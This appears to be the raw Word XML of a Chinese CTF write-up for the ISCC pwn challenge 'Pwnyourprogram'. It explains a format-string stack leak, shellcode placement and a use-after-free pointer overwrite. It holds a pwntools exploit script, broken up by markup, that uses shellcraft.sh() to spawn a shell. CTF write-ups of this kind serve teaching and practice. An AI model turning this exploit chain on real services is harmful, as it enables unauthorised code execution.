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8DBCE" w14:textId="77777777" w:rsidR="00B90F6B" w:rsidRDefault="00B90F6B" w:rsidP="00B90F6B">
      <w:bookmarkStart w:id="0" w:name="_Hlk167376892"/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0333F7">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>1504895347@</w:t>
        </w:r>
        <w:r w:rsidRPr="000333F7">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>qq</w:t>
        </w:r>
        <w:r w:rsidRPr="000333F7">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A453D1C" w14:textId="77777777" w:rsidR="00B90F6B" w:rsidRDefault="00B90F6B" w:rsidP="00B90F6B"/>
    <w:p w14:paraId="5D463BC1" w14:textId="2B2598EA" w:rsidR="00B90F6B" w:rsidRDefault="00B90F6B" w:rsidP="00B90F6B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pwn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yourprogram</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A6F3A1F" w14:textId="77777777" w:rsidR="00B90F6B" w:rsidRDefault="00B90F6B" w:rsidP="00B90F6B"/>
    <w:p w14:paraId="48159D64" w14:textId="4425100D" w:rsidR="00B90F6B" w:rsidRDefault="00B90F6B" w:rsidP="00B90F6B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路：</w:t>
      </w:r>
      <w:r w:rsidR="00CC06FB" w:rsidRPr="00CC06FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CE5955E" wp14:editId="37792CB5">
            <wp:extent cx="5274310" cy="1382395"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="1075859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5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6FB" w:rsidRPr="00CC06FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C180C01" wp14:editId="0C91D77A">
            <wp:extent cx="5274310" cy="1744980"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="156959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2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121B84A" w14:textId="2DE3680C" w:rsidR="00437A38" w:rsidRDefault="00CC06FB">
      <w:r w:rsidRPr="00CC06FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="081B5F11" wp14:editId="3505DACC">
            <wp:extent cx="5274310" cy="2548255"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="59755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1409" w14:textId="68BC453F" w:rsidR="00CC06FB" w:rsidRDefault="00CC06FB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上方是有漏洞的函数图片，存在格式化字符串漏洞，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溢出漏洞和UAF漏洞，在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上可以执行shellcode。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7856D0D9" w14:textId="3020772B" w:rsidR="00CC06FB" w:rsidRDefault="00CC06FB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具体攻击流程：利用格式化字符串漏洞</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泄露站地址</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，之后ret写shellcode里，最后触发UAF漏洞修改还是指针为authorize，最最后输入payload和shellcode就行了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1F46D0" w14:textId="6D22727A" w:rsidR="00133152" w:rsidRDefault="00133152">
      <w:r w:rsidRPr="00133152">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D8EA0B0" wp14:editId="692C0E8D">
            <wp:extent cx="5274310" cy="3811905"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="190987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F3E" w14:textId="4A5F9C4C" w:rsidR="00133152" w:rsidRDefault="00133152">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A86CB6" w14:textId="77777777" w:rsidR="00CC3657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11535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C1153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153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02909BEF" w14:textId="06E27B7F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CCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>context.log_level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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'debug'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BAD2A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CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>context(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11535">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>arch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'amd64</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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1535">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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2F23D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C11535">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>context.terminal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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tmux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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splitw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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'-h'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D7DAB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9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C1153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11535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proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C11535">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>yourprogram</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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921F116" w14:textId="1E7A24EB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remote(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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B5CEA8"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10032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2AC0EB" w14:textId="6282C791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 xml:space="preserve">"Enter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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key:"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proofErr w:type="spellEnd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D7BA7D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\x41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C11535" w:rsidRPr="00C11535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37CED0" w14:textId="4E5824CB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"Welcome to ISCC, tell me your name:"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"/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C11535" w:rsidRPr="00C11535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05DA6D" w14:textId="6BB23B12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 Tell me your choice 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9971C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9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>off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15AE7B2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'%10$p'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B7E9F9" w14:textId="4A7CB3F7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97EEFD" w14:textId="77D00E1E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"0x"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AB85193" w14:textId="237D2823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9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>stk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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="00A55267"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1E634C" w14:textId="3D9CEA15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 Tell me your choice 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D42DDB" w14:textId="133EE1DA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 xml:space="preserve">"Are you sure you want to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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exit"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proofErr w:type="spellEnd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D7BA7D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\x24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EFFCD4" w14:textId="100263CF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 Tell me your choice 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C33BCB" w14:textId="3839D093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"Are you sure you want to exit"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proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C11535"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'n</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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D9881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401276</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B463CFD" w14:textId="7BD5AADA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 Tell me your choice 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9E619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11535">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pause(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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12DA15" w14:textId="683505E1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'/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C11535" w:rsidRPr="00C11535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C11535" w:rsidRPr="00C1153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p64(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C11535" w:rsidRPr="00C11535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="00C11535" w:rsidRPr="00C1153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C11535" w:rsidRPr="00C115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455DF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9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>shellcode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65330D8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729A8F0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6D75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39032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39D6C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F0E58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3A191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44B8F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F78C14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9ADF8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E7E6D7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39B71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3186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000A9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A2929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DEF8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F72A2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18756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5BDCF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38913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42818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528C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EDA2F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91F76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CD3F8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0AE35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C0CE3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B3B14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A4CB8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20F8F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FC36C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CD833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2F036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A1A7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EB1741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BEA58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E07DD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3476BA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F8DBE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17F8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B044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31C12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CB22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D03BA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31A06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387FE4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74D76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777A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0B0FC7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0D3854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ACD94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B181C2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FD208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D651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403A55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AEB55B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436C0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9309C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EADF9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90D54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53302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B6B31D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62FD4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9AC1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EF643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E4039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6ABC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DBE0D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04D9CA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7F98D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18739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31618E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C63B9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E922B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E5A0E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5B3A6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DD466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E1EED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93EA9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9BB02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C251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BD09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25D64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991A6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96FA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1D57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A3A71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4DCFA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234F1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749F26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A2CB8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6682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F9863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44112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F77D1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B0894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8EAF7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EE908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2B16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816CA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649A4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7E50B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3EBFAB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FDFD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0FB615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D3581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4E68D3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C47F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61E92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339916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8CAE6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0C95C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DA57F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6CAD4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40C99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81D02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1AB05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EC2AC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32DB5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1496A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CE56C6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7C611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A4A5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5F1E8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2213F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64505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66B8F4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65211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B337F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F76B29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ADCC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82AAF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E4AFC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1C39138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4AFFE8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C4A05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4809E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B0330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A2DDD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25B82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16A6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062ED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40CE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417B4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23FEA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ED4A2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6435D5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60A6E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3EFAC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BF807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9B07A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64B49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C71BB3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27C7B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B2624E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6389B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A60CD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4851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C71459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86939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D989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7E19B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AD96A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B79C40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6263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9634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7426E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04B5D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1C00D9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D5F43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0752E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034B3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B6A6AA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898BE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C9595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7617F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381DD4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5813E83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C0F2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2ACF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4668C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27381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4A0F25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7F231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73125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9432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6DEB7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9EE296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B6A4E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E178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E0672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E34F1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5DF71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DD80C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A3291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6C316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B0BC7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3A54C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4D4323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B961C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D7E0E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DB207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79FB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B16DA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C7B26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14B98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1DE6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C1ECBE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80C0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A67FE3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8FB29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C3DA7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DA118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39416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8E0EF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E1D73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09B0D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D1345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D1D57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F6B9E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46A8F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31CBC6B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9452C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383F6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E6668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BF7534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41D02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DA9B5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87380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7CED9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BB452B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FD4FB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C848F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6A2C2E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1CF0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4699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745E5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54060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76F20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301A6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072118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162F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3465D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340D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5EE0F4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CD9A6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A9E37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8862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306A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68621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88654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BA2029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499A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BB8C5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9047D8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50E1F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FA6C1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310BB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E739C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A1477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3F597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586E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92C09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F265E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43BFFB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5CCD330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2B1B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BBE84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CA9CD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F0EFE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2F4E8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E539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DA2D3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905B6E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B45A13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945AB4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C8411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7522A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BE8B8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FC785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A2DC6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FEDE4F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74815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4938CC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8C666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41CC4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4746A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6DE2E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A6DC9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E6A2FF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BE70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009EF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DECD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86752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C48BE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C3AE5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05495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DBEF9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8445C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75EB2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FCA8F1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8E15B8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81E83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B593F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F94C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06525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9192D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BB4D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AC0E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44AC56B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8788A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92C7F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0DF8E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9130CF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E51F0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E4D57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DF1D3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D7083A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7853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1F6C9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958D5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5BE3B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3C152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303ACE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F0C84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352BE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8E2B90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E20A0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6A7945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F3D49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2F2A5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7795F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8C0AFB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2300C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0E112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90AF2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9BD9B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FBE89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616E20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E982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37BAE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0B0DD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31E884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5E2AC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9B4C2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C4B7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C837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1285C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A2DA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B70D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A0C86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35E0C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FE053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591A182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1D1A2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806A4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7952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71E5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7DD92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CFFB65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02B1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630DF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1AE9E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98D5AA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EDC8B9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E3290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A97B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F9C9E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C27B2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FB6CC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A88A71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7F225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55C05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C0CE4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B754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22A4F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20708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8AA79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4D1C6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48A57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600A9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7993A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D22770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E3C85E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E9EAA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DAD1B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FAB5DC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39530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3385D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A36A5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D32890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BED49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1ED730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63924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EFEF3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B7C7C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F78C24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26C1669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488CDE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F4FC8B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D5193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434ED9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8B33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34AC0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B8C09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C058B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1824D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4A4D8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8C424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CD8682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2074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20B9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8B368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B7FEA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B0770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D309C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62B1E0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F2B49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B77EE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8BDE7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E1B1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691F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E17E7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BDAA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84B289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661EB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9CE62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357C9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F9AFC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D865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B964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599C3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C9EA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2BAF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8F99C9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F84E4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2E0C1D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78C46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1343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10E25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C8B5F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3DFAB1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7A7E1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43E23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4B2C9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FB061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2624C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5EDB5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512412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5B0C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F2CA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57E74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4FB6E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028934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A7296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ECB5C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0761B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43BDCE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9671B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194831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7609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6504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E5B542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0B9306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835A9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36B43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AC4A5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ADCE5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4D0CEE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99EF0D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8BA39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10503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E339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28BC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CBB12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5727D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9F34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BBA60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13789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061E0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BA14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BD1A1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9FF7B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EE38B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0372A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2152D2F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173A36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5041D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FAC16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D977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C0203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1A011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4CB64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CAA5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3B6C2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B1C3E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B6432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93BD44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4BE48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8B4A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BC1EEB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F0DF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BAB0F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24363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41D70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E397D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44DAA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85712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5253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5C7AE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E4B81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77ADC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51F66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E66516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64D34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F192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0A1078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AA4CB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4DC25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24CCA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CD29F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CEF0A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F1D71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D519D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4E404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059D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89FE5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EE77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737ED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13D61CB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18F9D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367B8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2D1D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D046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1A84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4FAC8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B9B138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4A1E3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7689A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8B01A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ECAB8B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1DDB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69DBD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E2397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67DC5B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162A4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62013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D5D0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AAEFC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BE300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45BBA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3E106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F08F5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D20D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62AD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AA3F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84BC88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582B5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84B6E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6A6C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D7123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E3AA9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153E0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F84E3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DE0B2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5F537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11530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AAC46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3D783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3A875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865E90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A9404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14C1D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375DE06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75995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5889D9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133EF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62722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C20A6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15C8C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C4D03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7497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F2B08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6A400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27D78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839D8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3FDF5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682A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40DF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0B84C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95DEC0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34BFD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B0087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40F4D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FE173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CCEE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EEF7F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AB808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6E343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D65A9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5EB55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9608E7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45873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609CE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B70EB1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F6C33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ABFF3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6B43A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0EAFD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B7B921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A103F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22181E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825C9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2680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27BC3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6C8D5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76B9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15B01E3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082CF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503D7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51CA7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6D18D8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2F3A6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E0616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1057A0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27E71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DA2BC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CDA4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37C82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055F4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25C12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6EAC4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D4472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4BBBEA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8EBC3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BD6EA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DE331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5BCE6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60B253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9F349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B1C35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9F16A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234D3C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FADE56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46149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490572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06BF7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F20BB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8B90CD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2EF41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A56071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5AF22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093C4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5A55C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9948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981F95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47FC9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6B2E3B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D76E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EC3721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AFCA33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690F2E8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679DDC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C3E974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3E532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0939F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018C0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966A7F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466F1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320C6C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75CEA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84BB4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C113CA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51A74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38BB83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2628B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F5949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451DB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3558FF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4804B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E5C8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36B95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871E6F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4B5BAA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AC6E30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0134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4DB6B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6798B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59B51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183FCE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8A1EC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CCAC7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7010CC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54D7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7DD6C2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489DAD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9E6F4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42007E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DD091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9B2396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550146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2BAF4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EFF3E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6DFA0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1EC9F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3036211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A0DAA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0F039D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E6CCE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4FD32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641DD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3D8999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883AD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04580C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69264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DED8A0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D4A5B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4E5B3B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B2D79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A9D2E4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B043C2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C842AB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566743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85000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5EE02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CA7A0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B774E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0C4AD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9FBED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D6858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0F7B6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FDEF9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3DC5CA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DB376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FE84D5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ECF3C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650F10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3BB4A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F8DF7A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461C5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E8CCF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0D1BF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4F7B27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D858AB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277D6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1019F1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6423A8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CC5E2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C45DE5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5F6F31A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7CFC3A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91D98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52CD2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996664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9DF9D3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9E5F5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0BCF7E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C7E5A1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5204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7945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6328E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241E2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A56C8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42216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0877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1EB0E0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186445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6F7911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8726D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EA7C2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AA6AF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7D579E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B2E21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9895A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B0EB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5988E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3E6A67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8D102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8B26C3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FEF042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F7E20A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4B7AF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5D41B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3BC66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136BD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08033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6F43B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84D5C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0A5C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99196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C7112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8D5650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90D61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28712A0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86574C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73DDF4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BAB1FE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F39F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3A254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8B5B8D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81D17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54E01F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CAE805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D7DEC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2E52B7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CC0F1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EABAD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80E66C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B8AB61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79691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3C1D9D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D0082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D6306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0B2CD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0C41D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99949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4E64DE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247959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F43D485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3CD18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03FE2E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DF0286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14B06F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657A5E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B85274E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E4183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55E728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918B0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E8F467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98E1EB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C3C244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A485F3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793C8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151EB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048AB2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EDB9C83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A102C2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lastRenderedPageBreak/>
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="497A907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7E05C75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EBDAD8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DB6C1D4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73694D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F7F59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A9639C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033C53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D227A3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EB8887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8594029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2FF3E7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50B047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2B7F2E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5EF2B77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03634502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25B09D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996163C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1DDFE96B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20A7DBF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786D3FD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6A7F75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C4673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27B7703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43587DF1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4E4547A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3689A29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C11535">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="592E4AC6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C11535">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>shellcraft.sh(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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F76D50" w14:textId="77777777" w:rsidR="00C11535" w:rsidRPr="00C11535" w:rsidRDefault="00C11535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11535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1535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D7BA7D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\x41</w:t>
      </w:r>
      <w:r w:rsidRPr="00C1153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11535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p64(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11535">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>stk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C11535">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C11535">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11535">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B5CEA8"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ff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C11535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End"/>
      <w:r w:rsidRPr="00C11535">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>asm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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11535">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r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2978AB" w14:textId="51C4A408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 Tell me your choice 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071375" w14:textId="6C602FED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 xml:space="preserve">"Enter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C11535" w:rsidRPr="00C11535">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key:"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11535" w:rsidRPr="00C11535">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spell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825974" w14:textId="7E4291BF" w:rsidR="00C11535" w:rsidRPr="00C11535" w:rsidRDefault="00A55267" w:rsidP="00C1153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9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>conn</w:t>
      </w:r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proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C11535" w:rsidRPr="00C11535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BA7CD67" w14:textId="77777777" w:rsidR="00133152" w:rsidRDefault="00133152"/>
    <w:sectPr w:rsidR="0013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3DF3D" w14:textId="77777777" w:rsidR="00BF2000" w:rsidRDefault="00BF2000" w:rsidP="00B90F6B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="65560203" w14:textId="77777777" w:rsidR="00BF2000" w:rsidRDefault="00BF2000" w:rsidP="00B9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8F4CB" w14:textId="77777777" w:rsidR="00BF2000" w:rsidRDefault="00BF2000" w:rsidP="00B90F6B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5101F02F" w14:textId="77777777" w:rsidR="00BF2000" w:rsidRDefault="00BF2000" w:rsidP="00B9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33"/>
    <w:rsid w:val="0003097F"/>
    <w:rsid w:val="00133152"/>
    <w:rsid w:val="00437A38"/>
    <w:rsid w:val="00464929"/>
    <w:rsid w:val="005B50C7"/>
    <w:rsid w:val="007619BA"/>
    <w:rsid w:val="00774012"/>
    <w:rsid w:val="009F5073"/>
    <w:rsid w:val="00A55267"/>
    <w:rsid w:val="00A74F33"/>
    <w:rsid w:val="00B013C9"/>
    <w:rsid w:val="00B90F6B"/>
    <w:rsid w:val="00BF2000"/>
    <w:rsid w:val="00C11535"/>
    <w:rsid w:val="00CA0415"/>
    <w:rsid w:val="00CC06FB"/>
    <w:rsid w:val="00CC3657"/>
    <w:rsid w:val="00CD09A9"/>
    <w:rsid w:val="00F06B94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3CEE9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5B410DD2-2C44-4943-AB47-1C08E06C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F6B"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B90F6B"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00C11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6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-23T09:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-24T09:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>